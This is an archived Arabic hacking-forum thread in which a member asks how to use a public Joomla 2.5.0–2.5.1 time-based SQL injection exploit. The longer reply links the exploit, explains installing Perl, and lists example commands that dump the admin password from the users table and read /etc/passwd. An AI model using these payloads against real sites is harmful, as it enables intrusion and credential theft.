:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   شرح ثغره (http://www.vbspiders.com/vb/t61392.html)

غير مسجل 03-19-2012 08:08 PM
شرح ثغره
 
السلام عليكم

مطلوب شرح الثغره الجديده
Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit

معاني الفراق 03-20-2012 12:56 AM
رد: شرح ثغره
 
التغره بلغه البيرل
استخدم مترجم بيرل

Dr.NaNo 03-20-2012 06:13 AM
رد: شرح ثغره
 
وعليكم السلام ورحمه الله وبركاته.

هذه هي الثغرة لم تقم بوضع رابطها :

http://www.exploit-db.com/exploits/18618/

اقتباس:
#!/usr/bin/perl
كما تلاحظ الثغرة مكتوبة بلغة البيرل تحتاج لمترجم البيرل بجهازك لكي تستطيع إستثمار الثغرة.

لتحميل مترجم البيرل من موقعه الرسمي :

http://www.activestate.com/activeperl/downloads

بعد ذلك تذهب إلى شاشة الدوس وتذهب لمسار الملف وتنفذ الأمر ك

perl 18618.pl

سوف يأتيك الشرح لكيفية التشغيل :

examples:
get admin password:
18618.pl http://host/joomla/ 3 'database()'
18618.pl http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema="joomla" and table_name like "%25_users"'
18618.pl http://host/joomla/ 3 'select password from zzzz_users limit 1'
get file /etc/passwd
18618.pl http://host/joomla/ 3 'load_file("/etc/passwd")'


الثغرة ليست بتلك الخطورة ,


الساعة الآن 03:06 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0